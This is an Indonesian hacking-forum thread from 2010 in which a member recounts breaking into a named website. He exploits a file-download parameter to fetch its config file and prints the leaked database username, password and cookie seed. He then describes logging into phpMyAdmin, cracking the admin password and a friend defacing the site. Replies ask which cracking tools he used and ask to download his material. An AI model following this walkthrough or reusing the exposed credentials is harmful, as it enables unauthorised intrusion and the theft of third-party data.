Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 [POC] RFD (Remote File Disclousure)

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: [POC] RFD (Remote File Disclousure)   Sat Jan 09, 2010 11:14 pm

In The Name Of Allah


ana gak ingin apa-apa dari posting ana ini..
cuma ingin ridho Allah Ta'ala...

sebelumnya ana minta afwan kepada soa members yang jadi bagian staf cyberdos...
Ana tidak ada dendam dengan sapa pun disana...Ana minta afwan dengan sebesar-besarnya..

kebetulan cyberdos sudah tidak bisa di akses..
maka ana akan coba jabarkan poc yang ana buat ketika coba masuk ke database n web nya cyberdos...

Bismillah...

pada awalnya hanya ingin baca thread n lagi cari link download beberapa software yang ingin ana cari...
setelah coba obrak abrik thread disana..
ana coba masuk ke menu download yang tersedia di web nya cyberdos...
http://cyberdos.org/download.php

w00t!!!
ana lihat ada error...

ERROR : download file NOT SPECIFIED . USE force-download.php?file=filepath


ana langsung kaget...
ada RFD ne...
coba ana buat spekulasi
http://cyberdos.org/download.php?file=index.php

W00t!!!
ana diminta untuk download file index.php
ternyata server cyberdos mengizinkan ana melihat langsung script client side nya...index.php!!!

aksi berikutnya...
setelah yakin kalau ini benar vulnarable RFD..
menuju url..
http://cyberdos.org/download.php?file=config.php

w00t!!!
config.php nya telah di dapat...

Code:
<?php

$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'peace_cyberdos';
$db_username = 'peace_cyberdos';
$db_password = '30032006';
$db_prefix = 'punbb_';
$p_connect = false;

$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bbc64b7deec4260f';

$BoardFounder = 'admin@cyberdos.org';
$TimeOut = '300'; // Time in seconds before the authorization key times out
define('PUN', 1);


terlihat jelas disana...
$db_username = 'peace_cyberdos';
$db_password = '30032006';

username database => peace_cyberdos
password => 30032006

w00t!!!
skarang tinggal masuk ke cpanel...
http://cyberdos.org:2082

Sad

hasilnya not found..

berikutnya coba masuk ke phpmyadminnya...

http://cyberdos.org/phpmyadmin

setelah masukkan username n password yang di dapat...
bingo!!!!
mission complate...
database has been owned....

tinggal cari pass superadmin...
crack..
wew..
ternyata weak password..

tinggal login di sebagai admin...
cyberdos has been owned...

yang eksekusi n deface teman ana...
ana cuma founder bugs aja...

kebetulan kmaren kelupa mau buat dokumentasi ketika proses attacking...
maka ana sertakan dokumentasi dari bugs yang sama persis dari kk xshadow...
silahkan download akhi fillah smua..

Link download


Jazakallah khair
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
Neo|g4br1eL



Jumlah posting : 86
Join date : 07.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sun Jan 10, 2010 12:57 am

Untuk masalah cbd, ane tidak bisa berkata apapun karena ane tidak ada urusannya Very Happy
tp untuk berbagi ilmu, ane dengan sangat berterimakasih menerima dg snang hati,hehe.. Very Happy mungkin dg menjabarkan bug dan celah cbd, kita dapat saling belajar untuk membenahinya menjadi lebih baik.. No system perfectly safe,, Smile
Kembali Ke Atas Go down
Lihat profil user
Neo|g4br1eL



Jumlah posting : 86
Join date : 07.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sun Jan 10, 2010 1:02 am

Btw hash database phpbb crackingnya pke apa bro?
Kembali Ke Atas Go down
Lihat profil user
Tamu
Tamu



PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sun Jan 10, 2010 11:18 am

Alhamdulillah , Ilmu lagi nih , syukron akhi
Kembali Ke Atas Go down
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sun Jan 10, 2010 12:03 pm

Neo|g4br1eL wrote:
Btw hash database phpbb crackingnya pke apa bro?

kmaren ana coba di passcracking.com , kerinci.net n channel passcrack di irc...
n kalau tetap gak bisa ana test pake tools devilzc0decrack dari om gunslinger..

strong tools buat pass cracking..
hhe...
tapi tergantung dictionary nya juga...
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
SyNTaX eRRoR

avatar

Jumlah posting : 28
Join date : 12.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Thu Jan 14, 2010 2:17 am

syukron akhi
Kembali Ke Atas Go down
Lihat profil user
abbsolut_sakit_jiwa

avatar

Jumlah posting : 11
Join date : 12.01.10
Age : 31
Lokasi : HeLL

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Thu Jan 14, 2010 9:33 am

izin sedot gan lol!
Kembali Ke Atas Go down
Lihat profil user
Gariz_Keraz

avatar

Jumlah posting : 120
Join date : 12.01.10
Age : 23
Lokasi : Mojokerto

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Thu Jan 14, 2010 11:03 pm

Ane ijin sedot dulu y...
Kembali Ke Atas Go down
Lihat profil user http://www.afz-devils.co.cc
Spyw4re

avatar

Jumlah posting : 3
Join date : 29.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Fri Jan 29, 2010 2:04 pm

wow..
db cdos yah..
mantep2..
Kembali Ke Atas Go down
Lihat profil user
Neo|g4br1eL



Jumlah posting : 86
Join date : 07.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sat Jan 30, 2010 1:53 am

Link mati tuh bro Very Happy
Kembali Ke Atas Go down
Lihat profil user
newbie_043

avatar

Jumlah posting : 42
Join date : 11.01.10

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sat Jan 30, 2010 7:37 am

iya tuh dah mati...
Kembali Ke Atas Go down
Lihat profil user
Gariz_Keraz

avatar

Jumlah posting : 120
Join date : 12.01.10
Age : 23
Lokasi : Mojokerto

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sat Jan 30, 2010 8:16 am

Linknya Mati...... Arrow
Kembali Ke Atas Go down
Lihat profil user http://www.afz-devils.co.cc
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Sun Jan 31, 2010 12:06 am

Afwan akhi...
Link sudah di perbarui..

Download
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
abu adam

avatar

Jumlah posting : 43
Join date : 07.04.10
Lokasi : Diatas Bumi Dibawah Langit

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Mon Apr 19, 2010 12:39 am


Izin sedot dulu ya akhi

barokallohu fiikum
Kembali Ke Atas Go down
Lihat profil user http://jihadbukankenistaan.com/
rascal_21

avatar

Jumlah posting : 68
Join date : 29.04.10
Age : 28
Lokasi : Cyber Jihad

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Fri Jun 18, 2010 8:01 am

cyberkalashnikov wrote:
Afwan akhi...
Link sudah di perbarui..

Download

izin download akhi... Smile
Kembali Ke Atas Go down
Lihat profil user http://albantani-crew.friendhood.net/
scr34mz

avatar

Jumlah posting : 25
Join date : 28.07.10
Age : 25
Lokasi : Bandung

PostSubyek: Re: [POC] RFD (Remote File Disclousure)   Wed Jul 28, 2010 7:36 am

izin sedot kk Very Happy
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: [POC] RFD (Remote File Disclousure)   

Kembali Ke Atas Go down
 
[POC] RFD (Remote File Disclousure)
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: